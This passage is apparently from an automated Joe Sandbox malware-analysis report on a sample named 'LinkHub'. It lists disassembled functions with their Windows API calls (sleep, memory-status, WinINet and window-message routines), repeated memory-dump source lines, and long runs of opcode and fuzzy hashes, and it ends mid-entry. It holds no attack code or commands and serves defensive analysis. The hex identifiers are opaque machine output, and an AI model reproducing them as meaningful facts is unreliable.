                                                                                        • Instruction Fuzzy Hash: 3A812770610611EFDB14DF54C884B6ABBF9FF49710F10856EF94A8B6A1DBB0A891CB90
                                                                                        Function 0022E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0022E67D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 3213639722-2276729525
                                                                                        • Opcode ID: 41fb53ba92f3541c6d75fb04f15b5e84d4efcaba002326bc1d02f299eb9c3b3f
                                                                                        • Instruction ID: b6556690c76f5a2a824c8ee745b8d8a329939729430e85a2accfc33603f00c36
                                                                                        • Opcode Fuzzy Hash: 41fb53ba92f3541c6d75fb04f15b5e84d4efcaba002326bc1d02f299eb9c3b3f
                                                                                        • Instruction Fuzzy Hash: C4517DE1D38303A6CF15BF54ED0137A6BA4AB50B00F214D58F0D9892E8DF758CB5AA46
                                                                                        Function 0021A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #
                                                                                        • API String ID: 0-1885708031
                                                                                        • Opcode ID: 6630661b4a9f7ac0647fc06dca24c8504b16b2db6d85e5f24cc7672ee879a5dd
                                                                                        • Instruction ID: b1bbefbad49efa48a9c1145eec1936204ff572b2b8c8a2c892f44fa8f022d276
                                                                                        • Opcode Fuzzy Hash: 6630661b4a9f7ac0647fc06dca24c8504b16b2db6d85e5f24cc7672ee879a5dd
                                                                                        • Instruction Fuzzy Hash: 31515E31526347DFCB25DF28C041AFA7BA4EF25310F644049EC91AB2C1DBB09DAACB65
                                                                                        Function 0021F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 0021F6DB
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0021F6F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: 447d241e90901f76d985064607327a149f1c7910338d900138ab092f8fac741d
                                                                                        • Instruction ID: 1880a31d04485e8a3f26043c2885232c43260c3ebb3a076198b1e963bf15fe22
                                                                                        • Opcode Fuzzy Hash: 447d241e90901f76d985064607327a149f1c7910338d900138ab092f8fac741d
                                                                                        • Instruction Fuzzy Hash: A95148719187489BD320AF10EC86BABBBECFB94300F814C5DF1D9411A2DB718579CB66
                                                                                        Function 0027DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0027DB75
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0027DB7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_wcslen
                                                                                        • String ID: |
                                                                                        • API String ID: 596671847-2343686810
                                                                                        • Opcode ID: 2deddab4d2d61b0ae9de6244591508010479f53030f921e3af5bbdbe6cb4c079
                                                                                        • Instruction ID: 3c15d5d3816ada86713f5743726bba9f711541cb8a249f901b057289a8293807
                                                                                        • Opcode Fuzzy Hash: 2deddab4d2d61b0ae9de6244591508010479f53030f921e3af5bbdbe6cb4c079
                                                                                        • Instruction Fuzzy Hash: 23314F71821219EBCF16DFA4CC85AEEBFB9FF04304F104029F815A6166EB719966DF50
                                                                                        Function 00294008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 002940BD
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002940F8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: 3b9810dd93fb2330150cc2065a7850e358b4fdf12c3d7a2ec5daa02b9c2af56d
                                                                                        • Instruction ID: 2b1a720553d599ebb92e91f67428a80f5c6cc149f32a5b4b287bf12dc053731f
                                                                                        • Opcode Fuzzy Hash: 3b9810dd93fb2330150cc2065a7850e358b4fdf12c3d7a2ec5daa02b9c2af56d
                                                                                        • Instruction Fuzzy Hash: 03319071520604AADF14DF74DC80FFB77A9FF48724F008619F9A587190DA71ACA2DB60
                                                                                        Function 00294FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002950BD
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002950D2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: c14743f596089184fb5ec123b094678786262f5b8425461fd8526f16631845aa
                                                                                        • Instruction ID: b123dd249c40c2e81b737d6a33bd90d2761f284dbed26086811c25b4fd006397
                                                                                        • Opcode Fuzzy Hash: c14743f596089184fb5ec123b094678786262f5b8425461fd8526f16631845aa
                                                                                        • Instruction Fuzzy Hash: 74314374B1161A9FDF05CFA9C880BEABBB5FF09300F20406AE904AB391D771A955CF90
                                                                                        Function 002020B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • GetParent.USER32(?), ref: 00243440
                                                                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002434CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$ParentProc
                                                                                        • String ID: (-
                                                                                        • API String ID: 2181805148-4239615555
                                                                                        • Opcode ID: 89d1c17ab7f0f9f05d28c1a1bef928f37ceafb0301d12cf59c43b52e0dbd2a85
                                                                                        • Instruction ID: 16ab417210c91ade045d9901b4ba9b55650431a407713811b1956b76c2ceea3c
                                                                                        • Opcode Fuzzy Hash: 89d1c17ab7f0f9f05d28c1a1bef928f37ceafb0301d12cf59c43b52e0dbd2a85
                                                                                        • Instruction Fuzzy Hash: 5321A231611255EFCB2ADF68D84D9E53B6AEF06360F140246F6294B2E3C3718E79DA10
                                                                                        Function 002941AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00207873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002078B1
                                                                                          • Part of subcall function 00207873: GetStockObject.GDI32(00000011), ref: 002078C5
                                                                                          • Part of subcall function 00207873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002078CF
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00294216
                                                                                        • GetSysColor.USER32(00000012), ref: 00294230
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: 11f3599d1a77a1a86cdf16eeb443606f44b08f32b3915a2717a54f7b9caf416b
                                                                                        • Instruction ID: 9b4214f619dcde5f9555abff4ff04b8e800ce9598e66e27a6c61e4e5826c9de4
                                                                                        • Opcode Fuzzy Hash: 11f3599d1a77a1a86cdf16eeb443606f44b08f32b3915a2717a54f7b9caf416b
                                                                                        • Instruction Fuzzy Hash: 7B11F672A2020AAFDF01DFA8DC49EEA7BA8FB08314F054915FD55E3250D675E861EB60
                                                                                        Function 0027D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0027D7C2
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0027D7EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: cb241a077f7ab02e4156067c553b7f305c9cf3fea871e5db5363efef29f0569c
                                                                                        • Instruction ID: da133b535b0bf1ffd6fed17fcb81a98fa59468f669b3ddddd2659dee6429e1f8
                                                                                        • Opcode Fuzzy Hash: cb241a077f7ab02e4156067c553b7f305c9cf3fea871e5db5363efef29f0569c
                                                                                        • Instruction Fuzzy Hash: C611C67116523279D7384F668C49EF7FEADEF127A4F10821AB50D93180D6B49850D6F0
                                                                                        Function 002675ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 0026761D
                                                                                        • _wcslen.LIBCMT ref: 00267629
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                        • String ID: STOP
                                                                                        • API String ID: 1256254125-2411985666
                                                                                        • Opcode ID: bf2146321298dd8d1bf0d39c0bde676e3608d7132d14c68febae27d37faf4587
                                                                                        • Instruction ID: be19ba34107c59f8a901651d6808637ed70c83ffdb43008df684a5e77f9eae80
                                                                                        • Opcode Fuzzy Hash: bf2146321298dd8d1bf0d39c0bde676e3608d7132d14c68febae27d37faf4587
                                                                                        • Instruction Fuzzy Hash: 7801C832534A278BDB209FBDEC449BF73B9AB50758B500624E42192191EB71D9A09650
                                                                                        Function 0026262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00262699
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 624084870-1403004172
                                                                                        • Opcode ID: be1a38a3c6f7e1d0c2be5c6e3383451044e6ec286ae0a6850268e216a1f233ac
                                                                                        • Instruction ID: 7783dda2d97a675843ebac34593abc01376b371cdf9f68d713630a0bdec3a530
                                                                                        • Opcode Fuzzy Hash: be1a38a3c6f7e1d0c2be5c6e3383451044e6ec286ae0a6850268e216a1f233ac
                                                                                        • Instruction Fuzzy Hash: 07012475A30215ABCB05EBA0CC45DFE7368EF46350B50071AB872A32C2DA31586CCB60
                                                                                        Function 00262525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00262593
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 624084870-1403004172
                                                                                        • Opcode ID: b956ab2dfb638f23bd5a848ee21922e3161ad2f61c9904ecee5319edc44fa736
                                                                                        • Instruction ID: 46e054a0b14d8292773cd17fefe29b7de1c3cd5f9ea6fd6565242b5ad606d7d9
                                                                                        • Opcode Fuzzy Hash: b956ab2dfb638f23bd5a848ee21922e3161ad2f61c9904ecee5319edc44fa736
                                                                                        • Instruction Fuzzy Hash: 9F01DB75A70105ABCB29EB90C966EFF77A8DF56340F9001197803B32C2DB509E6CDAB1
                                                                                        Function 002625A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00262615
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 624084870-1403004172
                                                                                        • Opcode ID: ec135efcda13846b993afe49d5eacdf7a9ae7ba19309b772a7123005042524a0
                                                                                        • Instruction ID: a30d23b9987e52011164a215297c88fd1f727e512e008172428c130b6aad2195
                                                                                        • Opcode Fuzzy Hash: ec135efcda13846b993afe49d5eacdf7a9ae7ba19309b772a7123005042524a0
                                                                                        • Instruction Fuzzy Hash: 8C01F771A20105A6CB15EB90C941EFE73ACDF15340F5001157802B31C2DA508E2C9AB1
                                                                                        Function 002626B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00262720
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 624084870-1403004172
                                                                                        • Opcode ID: 45a269478036f304d4c52d4296a36fabcc8e7e6e6b57dba0ecf5e025cc494f1c
                                                                                        • Instruction ID: dbace1f0df61322fc1e145fa6b425e4e1303ae3a64d2b2e55707cb5c4bea0505
                                                                                        • Opcode Fuzzy Hash: 45a269478036f304d4c52d4296a36fabcc8e7e6e6b57dba0ecf5e025cc494f1c
                                                                                        • Instruction Fuzzy Hash: CCF0F475A60214A6CB16B7A48C45FFEB36CEF06380F400A19B462A32C2DB60582C8AA0
                                                                                        Function 00299AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00299B6D
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00299B53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                        • String ID: (-
                                                                                        • API String ID: 982171247-4239615555
                                                                                        • Opcode ID: 79aa4a23f44eb07262b157517c01c46db3c1cbff15ddc8cd03f536343b1a35cc
                                                                                        • Instruction ID: e2e980155f79132a961feb3d053566595ccf2b6b0b79479f4703dffc3c3bbfd1
                                                                                        • Opcode Fuzzy Hash: 79aa4a23f44eb07262b157517c01c46db3c1cbff15ddc8cd03f536343b1a35cc
                                                                                        • Instruction Fuzzy Hash: BF01D430111214EFCB259F58FC68F963B66FB85378F10051AF9021A5E1C7726C69DB60
                                                                                        Function 00233A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2<#$j3*
                                                                                        • API String ID: 0-310977406
                                                                                        • Opcode ID: f06526e953ddb3a5b5929f9e9cb39b7d7edc9adf749f38f0d4fa49bdd90d98c0
                                                                                        • Instruction ID: 687061ebc31a47418f44e053c1b268381cd51fe958280ec8c48571c6016edf55
